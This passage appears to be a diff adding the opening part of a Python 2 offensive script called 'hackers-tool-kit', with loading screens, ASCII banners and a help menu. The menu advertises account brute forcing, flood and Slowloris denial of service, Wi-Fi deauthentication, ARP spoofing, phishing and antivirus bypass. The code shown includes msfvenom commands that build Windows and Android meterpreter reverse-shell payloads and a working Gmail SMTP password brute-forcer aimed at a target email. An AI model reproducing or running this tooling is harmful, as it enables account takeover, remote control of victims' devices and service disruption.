]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,11) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + 